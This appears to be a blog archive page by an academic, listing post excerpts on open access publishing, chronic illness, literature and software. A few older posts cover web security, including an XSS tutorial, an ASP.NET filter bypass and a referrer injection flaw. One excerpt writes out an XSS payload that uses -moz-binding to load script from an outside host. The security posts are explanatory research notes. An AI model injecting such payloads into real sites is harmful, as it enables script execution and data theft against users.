Birkbeck, University of London

Martin Paul Eve

Very few people like thinking about the fact they will die. But it can prove a substantial administrative headache to loved ones if they don’t know about all of your finances, your passwords, your emails etc. At the same time, you shouldn’t be writing down passwords in any document that could be stolen or seen; it’s bad cybersecurity practice.

How to securely create an encrypted digital ‘in case of death’ document

This week, I have started work at Michigan State University, as interim technical lead on the Knowledge Commons project. I'll probably say more about this at some point soon. However, a huge part of onboarding at new digital/software places is getting your head around the stack and trying to get a development environment setup and ready to use.

Getting Knowledge Commons Works running locally

Open source projects like InvenioRDM – on which we rely for our repository software at Knowledge Commons – thrive on community contributions. When initiatives like ours not only use these platforms but actively contribute improvements back to the original codebase, everyone benefits. This “upstreaming” process takes work, but it represents the collaborative spirit that makes open source software so powerful.

Swimming upstream

This post picks up an argument that I made in [Theses on the Metaphors of Digital-Textual History](https://www.amazon.co.uk/Metaphors-Digital-Textual-History-Stanford-Technologies/dp/1503614883/ref=sr_1_1) about facts and copyright. Namely, that although facts are exempt from copyright, factual status is not necessarily stable.

Are metadata facts?

There are lots of things that I have learned about kidneys and their functions since BK virus destroyed mine. Kidneys regulate potassium in your blood; they also control phosphate levels; they remove urea from the blood stream; they take excess fluid out of your body and blood; they produce the hormones that stimulate the creation of red blood cells; and a whole host more. Kidneys are the Swiss Army Knives of internal organs.

Rollercoaster days

I am very pleased to say that my book, _Theses on the Metaphors of Digital-Textual History_, is out today!

Theses on the Metaphors of Digital-Textual History is out today!

Like most years, a mixed bag for me here. Kidney failure continues to be a truly challenging medical fiasco, with AV fistulas, overnight dialysis, hormone therapies, and much much more. I also continue to feel the severe difficulties of my rheumatoid arthritis, which required a hip replacement in April.

My academic year in review

I posted, a short while ago, about the [reprinting of OA books under CC licenses](https://eve.gd/2021/03/02/oa-books-being-reprinted-under-cc-by-license/). This is, of course, totally legal and allowed under the more liberal Creative Commons licenses. However, it will, I feel, alienate academics from OA. I think that they will consider it derogatory treatment of their work.

An update on the reprint of my book

"End-stage renal disease is a terminal illness with a glomerular filtration rate of less than 15 mL/min." - [Hashmi et al.](https://www.ncbi.nlm.nih.gov/books/NBK499861/) My current state is an estimated GFR of 7 with dialysis 5 days per week to replace my destroyed kidney function. But the basic fact remains that this condition is terminal; it's just the question of how long it takes to finish me off.

How long have I got, doc?

Some remarks that will be presented at the SHARP plenary roundtable: AI in the Communications Circuit. Last week, the CEO of Microsoft’s AI division said, in an interview with CNBC, that “I think that with respect to content that’s already on the open web, the social contract of that content since the ’90s has been that it is fair use.

AI and Open Cultural Licensing (remarks to be presented at the SHARP plenary roundtable: AI In the Communications Circuit)

People often think that reading a novel is a very linear activity. You start at the start and proceed through the text. As in most media forms, though, the beginning of any novel is really not truly its beginning. The American author, Thomas Pynchon, the focus of my paper today, is famed, it could be argued, mostly for three things.

‘Begin at the beginning, the King said, very gravely’: Serious Openings and Subversive Epigraphs in the Novels of Thomas Pynchon

The Research Excellence Framework is the UK system for rewarding unhypothecated research funding from the government to universities. It gives a block of funding that can be used in any way that the institution sees fit to advance research. It’s particularly useful in disciplines with less project funding to give research time to individual academics. The problem is, lots of academics hate REF.

The problem for REF 2029

2023 continued to pose the all-important question: just how many health disasters can I endure? This year, I started haemodialysis as my kidneys entered the extremely worryingly named "end-stage renal failure". This turns out to be a very long-term prospect, as I can't have a transplant owing both to BK viremia (which caused the kidney damage in the first place) and a conflict with the immunosuppression that treats my rheumatoid arthritis.

My 2023 year in review

Today’s big news is that Crossref has acquired the Retraction Watch database of expressions of concerns and retractions and has made it openly accessible to anyone who wants to use it. I’m waiting for full confirmation of the license or public domain dedication under which it will be released, but this is still a great commitment of Crossref to the POSI principles. The liberation of this database is good for science and scholarship in general.

Retract this!

Well, it finally happened, as Queen once sang. But I am not going “slightly mad” as the song professes. Instead, I have decided that the time has come where I need a wheelchair to get around. My arthritic hip damage is substantial and painful – and it’s stopping me going places. I rarely want to go out anywhere “for a walk” because the pain is so great. A wheelchair will help with this.  But there are some things about it that bother me.

New wheels

A letter to the Editor of the _Guardian_, who declined to publish it. Dear Madam, Your Economics Editor, Larry Elliott (5th December, “[I’ve got news for those who say Brexit is a disaster: it isn’t. That’s why rejoining is just a pipe dream](https://www.theguardian.com/commentisfree/2023/dec/05/brexit-disaster-rejoining-channel-europe-economy?CMP=share_btn_tw)”), offers an opinion piece that appears to be based on little more than his own

Land of hope and tolerance

I recently wanted to use ElasticSearch (or OpenSearch as Amazon terms it from the fork) in an AWS environment, using Python. When I tried to connect I got a very painful 403 Forbidden error.

Connecting to AWS OpenSearch Serverless using Python

In recent days, several signatories to the Principles on Open Scholarly Infrastructure have taken to performing self-audits of their compliance with the principles. Of course, holding oneself to account in this way is a welcome development. Without some form of self-appraisal it is not possible to know how close one is to fulfilling the goals of POSI.

Rules vs. Principles in POSI

This is a quick note to say that, in the near future, I will be abandoning the martineve.com domain name. For quite some time now, the primary address for this blog and site has been https://eve.gd. I know that cool URLs don’t change. But I guess I am not totally cool.

Sunsetting martineve.com

On pain and subjectivity

LocalStack is a great cloud emulation layer. It lets you simulate interaction with AWS, which is great for writing integration tests. However, I wanted a system that, when run locally, would spin up the LocalStack server and then destroy it when done. But when running the test on GitLab CI, it will use the “service” provision of their continuous integration system and connect to that.

Integration testing locally and on GitLab CI using LocalStack

I have read, with some dismay, the draft of Ithaka S+R’s most recent report. I offer here some critical remarks that I hope will allow for revision of the work, which I believe offers an insular, digital-nationalist, exclusionary vision for the future of scholarly communications. The views herein are my personal take, not those of any organization for which I work.

The latest Ithaka S+R draft report is hugely regressive

I have been thinking, this week, about the observability of AWS Lambda functions in API Gateway contexts. The major challenge is that Prometheus metrics pose a problem as they are pull-only (via a scraping endpoint). Prometheus metrics are stored in a temporary disk cache and then pulled off-site by Grafana etc.

On application observability in serverless cloud contexts

So, after three years of shielding, I got Covid. I contracted it at hospital (or on my way there). How do I know? Because I don’t go anywhere else. I thought, though, that it might be useful to document my experience of getting antiviral treatments for Covid as an extremely clinically vulnerable individual. I developed a sore throat on Saturday evening (17th December 2022) but tested negative.

How do you get access to antivirals on the NHS CDMU system and does it work?

In my new role at Crossref I work on a series of data pipelines for research and development projects. These are resource-intensive data processing tasks that need to be executed periodically on a schedule, with good observability, but also with parallel processing capacity. Amazon’s Managed Workflows for Apache Airflow (MWAA) seems like an ideal solution for this.

A data pipeline with Apache Airflow and Dask

As I posted a while ago, from January 2023 I will be working at Crossref while retaining my university Professorship. I wanted, here, to outline a few of the projects that I hope to work on once I get started there. I should say upfront: I am afraid there is no time estimate on these and we can’t guarantee to prioritise any particular project. But if there is one that stands out to you, do let me know, as this serves as a useful community gauge.

Some of my upcoming projects at Crossref

Like many years, 2022 was a year of health problems for me. The entire year has been overshadowed by the episode of kidney failure that I suffered as a result of BK virus associated nephropathy. It is fair to say that I have been quite seriously unwell. I also spent a long period of this year, in my spare time, campaigning for protection of the immunocompromised with the monoclonal antibody therapy, Evusheld.

My 2022 year in review

My backup application, django-caretaker, has to reload the SQLite database after it has run the import procedure. Basically, we're using an external tool to recreate (delete and replace) the original SQL file on disk. But Django won't always reload this. There are three "gotchas" for how to handle this. The first is that you need a reload function.

Reloading SQLite databases in Django when there have been external changes

I don't normally do this kind of direct outreach, but the situation for people with serious immune system compromise at the moment in the UK is grim. We cannot produce responses to the covid vaccines and so remain shielding/in total isolation.

How YOU can help people still shielding

OK, this is different from my usual fare, but I've been thinking about upgrading my home LAN to 10GbE. My WAN connection is now more than 1Gbit and so I'm maxxing out the link. Finding kit that works on Linux (and even, shudder, FreeBSD), though, is somewhat tricky.

Good computer networking kit

I had a setup of deluge running on a remote box as a daemon. I had verified the credentials were all OK, the port forwarding was setup, the daemon was running and listening. But I couldn't connect remotely. CHECK THE VERSION OF DELUGED THAT YOU ARE RUNNING! If you are running deluged 1.3.x and trying to connect with deluge 2.x, it will report that the remote server is not running.

If you cannot connect to a deluged daemon remotely

This post forms part of my '[aspects of the novel](/2022/01/04/aspects-of-the-novel/)' collection. Please do note that these entries, which may appear basic, are simply my own notes on the subject. They implicitly or explicitly describe a canon not of my own making or choosing and replicate this from various sources. The original encyclopaedia articles are far more comprehensive, nuanced and worth consulting.

Bildungsroman

One of the challenges for the open access movement has been to work out how to transition from a model in which libraries build their own local collections to one in which they fund open access. The model of article and book processing charges has led us to believe that these are different activities.

Open access is building a one-time, shared, international library collection

Anthropology and the Novel

Andean Novels

Ancient China

Lots about contemporary computation stresses availability and _uptime_. It is important, for instance, that the OLH servers for which I have ultimate responsibility stay online. Otherwise, the articles that we publish would not be readable. As a result, various tools, such as "[Uptime Robot](https://uptimerobot.com/)", have emerged that are designed to alert you when a server goes offline.

Aiming for downtime

University of Sussex

30575816-Columbia-University-Press-Catalog-Fall-2010.pdf

(6182 KB) According to the Columbia University Press Fall Catalogue, there is a nice treat on it's way for DFW fans! Fate, Time, and Language An Essay on Free Will David Foster Wallace The late novelist's legendary, unpublished work reveals the philosophical foundations of his celebrated fiction.

New David Foster Wallace book Fall 2010

A quick tip that I think it's worth raising, as it's just come to the fore in my life(!), is that the citation style you employ can have a large impact on the number of words over the course of an 80,000 word thesis. I have been using, until today, the Chicago style with a full note on every page.

Doctoral Thesis Editing: Cutting Words

University of Lincoln

That's a pretty specific title, I suspect, but as I am learning with the Open Library of Humanities, we're in uncharted territory, a place where the specifics matter.

Being called to account: tax considerations for UK-based collectively-funded open access publishers

So, it transpires that the Oxford University Students Union have had their freedom of information request rejected on the grounds that it is scheduled to be published. The exact wording reads: "I am therefore satisfied it is in the public's interest to withhold this information until it is published by the Russell Group." This is slightly troubling.

OUSU Freedom of Information requests

I have some qualms, which have been growing recently, about the vast number of meta- posts that have accumulated on the use of social media in academia. I need to state this is not a critique of any one of those individual pieces, or the people who made them. I agree with their content. Indeed, in the last week or so there have been several excellent articles published by colleagues for whom I have a great deal of respect.

Academia, EdTech, Blogging and Twitter: Enough with the Meta, Already?

One of the long running debates regarding the British Library reading rooms has resurfaced this week. Upon entering the library this morning I was handed a letter of invitation to the Reader's Committee (or similarly titled initiative); it's self-purported goal, to discuss requirements of readers at the BL that have gone unheeded by management. Several of these items are, indeed, worthy of discussion.

Undergraduates in the British Library reading rooms

The London Review of Books has just published a blog post entitled Wallace v. the Terrible Master. You can read the full article here: http://www.lrb.co.uk/blog/2010/03/16/alex-abramovich/wallace-v-the-terrible-master/ My concern is that, in every recent web publication on the author, the only aspect of his life in which people are interested, is his death.

Can we avoid the S word regarding David Foster Wallace?

It should be an easy task to resize image uploads in Django, but it turns out to be a bit more complicated than one would hope. Here are my findings.

Resizing image uploads in Django

Tomorrow I plan to attend the Digital Researcher seminar day at the British Library. It promises to be an excellent day providing insights on how researchers can best employ microblogging, social networking, social bookmarking/citations and many of the other nifty collaborative elements of the web that simply weren't there in the '90s.

Dark cloud looming

The result of a humanities discipline map for Digital Researcher 2010 at the British Library!  Humanities Map was originally published by Martin Paul Eve at Martin Paul Eve on March 15, 2010.

Humanities Map

My first attempt at Python got a slot on the Ubuntu opportunistic developer slot. Check it out here: http://www.jonobacon.org/2010/03/06/the-grand-app-writing-challenge-submissions/ Also, note, first post to posterous.    sshsplit featured was originally published by Martin Paul Eve at Martin Paul Eve on March 11, 2010.

sshsplit featured

Introducing sshsplit  sshsplit is a GPL-3 licensed application that multiplexes ssh dynamic tunnels. For example, you might normally run:  to get a tunnel on 127.0.0.1:54321 that goes through remote-host. However, if you are using a network-resource-intensive application (torrent clients for example), this single tunnel will not suffice for, say, 1000 concurrent connections.

sshsplit: a dynamic tunnel multiplexer

I've just been playing around with my webcam, which I haven't hooked up in ages, and was unable to get it working under my 64bit Fedora installation. Having done a bit of reading, and having found that some applications can use the camera, I worked out the solution.

64bit GNU/Linux and Webcams (Logitech Quickcam Express)

I've just been asked on Twitter as to whether it's worth presenting at postgraduate conferences and thought I'd share my thoughts in a short post. Answer: it depends what you want to get from a conference. If you are looking to meet intellectually stimulating people, get experience presenting and genuine feedback on your work, then a postgraduate conference is great.

Is it worth presenting at postgraduate conferences?

What is the point of a citation? As Anthony Grafton puts it in his history of the footnote, “the culturally contingent and eminently fallible footnote offers the only guarantee we have that statements about the past derive from identifiable sources. And that is the only ground we have to trust them” (233). So the point of a footnote/citation is to be able to lookup and check that epistemic claims are true? Sometimes.

Citations and addressability

I examined a Ph.D. thesis this week. I usually do about two or three of these a year. I was curious to work out how long it takes to undertake this task, so in my slightly obsessive fashion, I got cracking on the time tracking.

How long does it take to examine a PhD thesis?

On Mac OSX there is a really neat feature: the ability to create an "aggregate audio device" that chains multiple soundcards into a single virtual device. This essentially lets you expand your inputs and outputs indefinitely. You can do a similar thing with Jack on Linux and with ASIO4All on Windows, although with variable levels of success. My question is: where is the hardware device that will do this?

A missing audio hardware device

Today marks the 50th release on the [Tici Taci](https://musicbrainz.org/label/62db3e96-423a-4e9d-bf66-7a017f1dfc73) music label.

On music, life, Tici Taci, and a new release

Currently, owing to a bug, scp in Kubuntu and Ubuntu 9.10 (Karmic Koala) does not allow you to autocomplete remote directories (when you have a passwordless ssh setup, obviously).  While I have submitted a patch for review, this will not be backported into 9.10 and so, those who wish to have this functionality, should follow these steps:  Visit this bug to read about the problem.

Fixing scp completion in Ubuntu 9.10

If you read any review of the M-Audio Trigger Finger Pro, it sounds like a steal. A sequencer, drum machine, and more, all packed into a hardware unit that is available for about £100 on Ebay. Steal. The problem is, it seems that these reviewers have never actually tried to record midi output from the device.

M-Audio Trigger Finger Pro synchronisation problems

A coalition of funders from across Europe has proposed a bold initiative, called [Plan S](http://eprints.bbk.ac.uk/23819/), to [push towards OA for 2020](https://www.scienceeurope.org/coalition-s/). It includes the following 10 points: * Authors retain copyright of their publication with no restrictions.

On the practical implementation of Plan S

Queen Mary University of London

Just a quick note to announce the release of .NETIDS v.0.1.1.0 - a small update that adds some valuable features: Fixed bug of empty Report.Tags object Added options to SecurePage to disable each type of scanning Updated filters  Most significantly this means that you can control whether page Output Scanning is performed from a SecurePage derived page.

.NETIDS v.0.1.1.0 released

Today there were 5 flaws for Firefox and IE6/7 unveiled - 2 for IE and 3 for Firefox.  Michal Zalewski disclosed 3 at http://seclists.org/fulldisclosure/2007/Jun/0026.html and the other can be found at http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/.  A bad day for browsers was originally published by Martin Paul Eve at Martin Paul Eve on June 05, 2007.

A bad day for browsers

I spent some time this morning trying to work out why my CPU - the beastly Intel i9 7980XE - was capped at 2.6ghz when the BIOS allows scaling to 4.3ghz. When I ran the usually suggested cpufreq and cpupower commands, I received: "no or unknown cpufreq driver is active on this CPU". The reason for this was that you need, in the UEFI/BIOS, to enable: Intel Enhanced SpeedStep and the option to expose pstates.

Linux CPU Frequency Scaling on the Intel i9 7980XE

This page is designed to give an overview of Cross Site Scripting attacks on web sites, how they come into being, how to exploit them and how to protect against them. To fully comprehend Cross Site Scripting, or XSS as it is known (CSS is NOT used as an abbreviation because it causes confusion when talking about Cascading Style Sheets), it is necessary to have a basic understanding of (X)HTML, JavaScript and Server Side Scripting.

XSS Tutorial

ha.ckers are reporting that their book on Cross Site Scripting has finally been released! Buy a copy at Amazon!  RSnake + Jeremiah Grossman's Book Released was originally published by Martin Paul Eve at Martin Paul Eve on May 20, 2007.

RSnake + Jeremiah Grossman's Book Released

Stefano Di Paola presented an interesting paper on Flash security at OWASP 2007 which highlights the dangers of HTML being rendered from within Flash via GET querystrings. Of particular note is the non-sanitization of comments (filter evasion by // .jpg) so check it out.  XSF: Cross Site Flashing was originally published by Martin Paul Eve at Martin Paul Eve on May 19, 2007.

XSF: Cross Site Flashing

The latest version of Wine (as of 2009-06-23: wine-1.1.24) fixes an important regression that makes it far far easier to install Microsoft Office 2007 on Wine. I personally never use any of the Office suite for anything except ensuring that the documents that I export from OpenOffice for Word users look acceptable and professional.

Installing Office 2007 on wine 1.1.24

Just a quick note to point out this invaluable resource for those interested in XSS attack vectors; rsnake's XSS Cheat Sheet.  XSS Cheat Sheet was originally published by Martin Paul Eve at Martin Paul Eve on May 16, 2007.

XSS Cheat Sheet

kishord today presents a tool, called XSS in eXceSS and hosted by .mario that will allow you test attack vectors against a page in different contexts. On top of that it also incorporates PHP IDS, allowing you to skip whichever rules you choose.  From kishord's post:  Good stuff!  XSS in eXceSS: A "learn-XSS tool" was originally published by Martin Paul Eve at Martin Paul Eve on May 16, 2007.

XSS in eXceSS: A "learn-XSS tool"

For those who haven't yet seen this, .mario and christ1an over at sla.ckers has been working on a PHP Intrusion Detection System and the results are fairly promising! The system is based on regular expressions and seems to catch everything I've jammed into it so far.

PHP IDS

As the title says, heise Security have found a backdoor in the Artmedic CMS system. The interesting question is how this backdoor was implanted - giving the benefit of the doubt it's possible that the development server was compromised and the code injected (the changes date back to the 2nd of May), but on the other hand the developer's not to heise's emails could be indicative of something more sinister.

heise Security reports backdoor in Artmedic CMS

http://websecurity.com.ua/category/moseb/  MOSEB month of search engine bugs was originally published by Martin Paul Eve at Martin Paul Eve on May 16, 2007.

MOSEB month of search engine bugs

ASP.NET comes preloaded with some default XSS protection which is actually pretty nifty. However, it turns out that the system can be circumvented by a variety of methods, as illustrated by this test input:  {% highlight html %} {% endhighlight %}  Turns out that IE will still process attributes on closing tags which circumvents the filter for &lt;a whilst also treating /**/ as a null comment but obviously breaking .NET's filter regex.

Bypass ASP.NET XSS Protection in Internet Explorer

From the Prezi terms of use:  Section 6.2:  Section 9:  It is extremely ambiguous of Prezi to state that it both “obtains no rights to your content other than as provided for herein” while simultaneously claiming that the “content […] is owned, controlled, or licensed by or to Prezi”. Does an arrangement of items constitute “user content”? What if you make a unique creation (your “user content”) using Prezi's artwork?

Who owns a Prezi?

An interesting discussion today with one of my senior publishing technology developers, Mauro Sanchez, led me to thinking about the rights of presentation and author rights to object to derogatory treatment of work published in scholarly journals. Namely: in the digital age, if one has a publication in a journal, what rights do the publishers have to change that platform and the underlying objects of publication?

Academic author rights of presentation on mutable digital platforms

Reading

 Negative Dialectics

, I was unable to track down a succinct, suitable definition of the terms "intentio recta" and "intentio obliqua", first appearing on page 69 of the Ashton translation.

Adorno terminology: intentio recta and intention obliqua

I'm very pleased to be able to announce some forthcoming titles in the Bloomsbury _New Horizons in Contemporary Writing_ series that I edit! Dates are, of course, subject to change but we have a really exciting line up of titles coming soon!

Forthcoming Books in the New Horizons in Contemporary Writing Series

I am making a concerted effort to make grant applications that I have written openly available. We are far too secretive about these, because we don’t like to expose the cases where we “failed” (didn’t get the grant). I am no different to anyone else in this respect - it’s not gratifying to have to unveil that you applied for 50,000 grants and only got 1 of them. But it’s more realistic. So I’ll try to put up some “failures”, too.

A successful Philip Leverhulme Prize application in the field of languages and literature from 2019

Dark times at the moment. Authoritarianism is on the rise everywhere and censorship regimes become ever more common. None of the material on my blog is particularly sensitive. Some two decades out-of-date information security stuff, posts about English literature, some posts about health, and posts about scholarly communication. It’s not really the kind of stuff that will get me in trouble.

Going Dark: Running a Tor relay and a dark web version of this site

This text is derived from a lecture I gave to first-year undergraduates about a decade ago. It was languishing on my computer and I thought it better to put it out there for general educational benefit, in case it helps anyone starting out with her poetry.

An introduction to the poetry of Emily Dickinson

My days working at Knowledge Commons are highly varied. It’s great.

Testing 1, 2, 3 (on software testing and why it’s interesting even to non-developers/non-coders)

A few years ago I wrote an article: Eve, Martin Paul, [‘Thomas Pynchon, David Foster Wallace and the Problems of “Metamodernism”: Post-Millennial Post-Postmodernism?’](https://eprints.bbk.ac.uk/12246/),

 C21 Literature: Journal of 21st-Century Writings

, 1 (2012), 7–25. It was the first thing I wrote outside of my Ph.D. and I am not sure that the literary analysis is that good. I wouldn't read the second half of it if I were you.

My critique of metamodernism

I was having a pretty good week last week, until we got to the closing minutes of play. At that point, I learned that Amsterdam University Press (AUP) had been acquired by the for-profit corporate publishing behemoth Taylor &amp; Francis. This is not really a surprise in some ways. AUP had been transformed into a private, for-profit enterprise in 2019. So who cares? What’s the big deal?

What is a University Press?

In this piece on the future of peer review for the British Academy, I assert that, in the humanities: OA is not about abandoning peer review but it does provide the opportunity to rethink its role and our methods. 67% of existing OA journals do not charge APCs and yet academics have tended to steer clear of them.

Publication: 'Before the law: open access, quality control and the future of peer review'

A lot of the social media posts that I've seen recently about the UCU's call for "Action Short of a Strike" (ASOS) are fixated on the idea that everyone's contract stipulates that they will work from 9 in the morning until 5 (or 6) in the afternoon and that one should not work outside these hours. One should not send email, either, apparently outside these hours.

Action Short of a Strike Must Recognize That 9-5 is Not Always Helpful

Yesterday, academic social media went into overdrive as many intellectuals discovered LibGen (“Library Genesis”) for the first time, thanks to an article and tool in

 The Atlantic

. It is quite amazing to me that people have only just come to this.

A critical bibliography about LibGen, the pirate site that Meta used for AI training

As part of my work on Knowledge Commons, I want to make more of our development process open, welcoming, and transparent, by using blogging. So I will be writing some technical posts on what I’m doing there and how I’ve overcome various technical challenges. In this post, I want to set out how I got BuddyPress notifications into a separate application (our new “Profiles” app).  First: why am I doing this?

Getting external access to BuddyPress’s notifications (for Knowledge Commons)

This week, I took some time out to read Elly Griffith’s most recent book,

 The Frozen People

. I thought this sounded quite an interesting genre-fusing novel, welding together detective fiction and SF/time travel. Sure, it’s hardly the first to do so, but it sounded worth a read. I’d met the author a few years’ back through a mutual connection: Lesley Thompson, another British crime writer.

A few critical notes on Elly Griffith’s The Frozen People

I had a problem with my Tor relay last night. For some reason, the application (daemon) started but then after about 5 seconds it stopped listening. The Tor Metrics site was displaying a red button saying my node was unreachable and when I did “sudo ss -ltp” I got nothing. The application literally wasn’t “listening” (in network socket terms).  The answer was actually embarrassingly simple.

What to do when your Tor relay isn’t listening

Among the works of fiction in the feminist canon, few are as celebrated as Charlotte Perkins-Gilman’s “The Yellow Wallpaper”. This short story, or novella, depending on how you want to define those categories, details the abuse suffered by a woman in the supposed name of mental health, at the whim of her male “carers”. The story is now, as Catherine J. Golden notes, “among the most studied texts in the English-speaking world”. In this piece I

An Introduction to Charlotte Perkins-Gilman’s ‘The Yellow Wallpaper’

There's a lot of focus in the scholarly communications space on transformative agreements for the mega-publishers. Indeed, most of the discourse, most of the time, is about the big publishers in this space. They play Big Bad Wolf with their exorbitant profit margins and make for an easy target.

Small publishers and subscribe to open

Last weekend I converted my website hosting to an infrastructure-as-code solution. It's no big deal, I thought. It's just a static site so it must be really easy to provision this. Surely just some kind of AWS S3 bucket associated with a custom domain? I mean, generated static sites are great. They are fast, lightweight, and virtually un-hackable. Surely it must be easy to deploy this?

Static site hosting in the cloud should not be this hard in 2022

As many of you know, I have been involved for the past few months in a campaign to get Evusheld – a protective/prophylactic drug for immunocompromised people who do not respond well to Covid vaccines – available on the NHS in the UK. We have not succeeded on that front yet and I am not giving up. However, for my own protection, since AstraZeneca made the drug privately available last week, I have been able to procure it privately.

I had Evusheld privately in the UK

The title of this post refers not to the classic 1987 single by Run-DMC but, instead, to the trickiness of rheumatoid arthritis and vasculitis as multisystem inflammatory disorders with a range of diverse outcomes.

It's Tricky

# Affect Theory To be blunt, the past two and a half years have been terrible for me. Certainly, [they have been worse for others](https://getevusheld.uk/4_patients.html). But I have spent the last two years feeling that basic activities in public pose an existential threat. The isolation of shielding is bad -- but I do have my lovely wife and our little dog, so I am fortunate in that respect.

A glimmer of hope

The Asian-American Novel

The Baltic States and the Novel

18th-Century British Isles

The Brazilian Novel

As part of my 2021 research leave project, I am reading various encyclopaedias of the novel. As there is no way I could remember all that I have read, I have decided to make some notes in publicly accessible blog format. This post will serve as the coordinating index. The notes on these pages are much condensed and provide some indicative readings on the subject matter but by no means cover the full breadth of the encyclopaedias themselves.

Aspects of the Novel

2021 was another pretty bad pandemic year, in many ways. For those of us with immune system compromise it was alarming to see a near-wholesale return to "normality" among the general population when our lives remained under extreme threat.

My 2021 year in review

In 2021 I spent 506 hours answering email. That's less than the 558 that I spent on the task in 2020, but it's still a full 72 days' worth of my time per year. (My nominal contract is seven hours per day, but for an eight-hour day, it's still 63 days.) It's less than some people and more than others. I would like to do less of this as it's not terribly rewarding, so yesterday I read Cal Newport's _A World Without Email_.

Last year I spent 506 hours answering emails. How I hope to do less of it this year.

Many sites use JavaScript methods to inject a hidden form field into 404 pages to trace the original page that points to the invalid link. An example of this can be found at http://www.yaldex.com/FSPageDetails/_404Referrer.htm. The attentive observer will spot that this method of writing the field injects the HTTP referrer directly into the page without any sanitization. So what?

JavaScript Referer Scripts XSS Injection

Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context. The process works as follows: Inject attributes as follows (different encodings may be necessary): &lt;element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" /&gt;. Browser loads XBL document.

Martin Paul Eve

JavaScript Referer Scripts XSS Injection

Firefox XBL-JS Loader v1.0

Evaluating the security of the JSONRequest object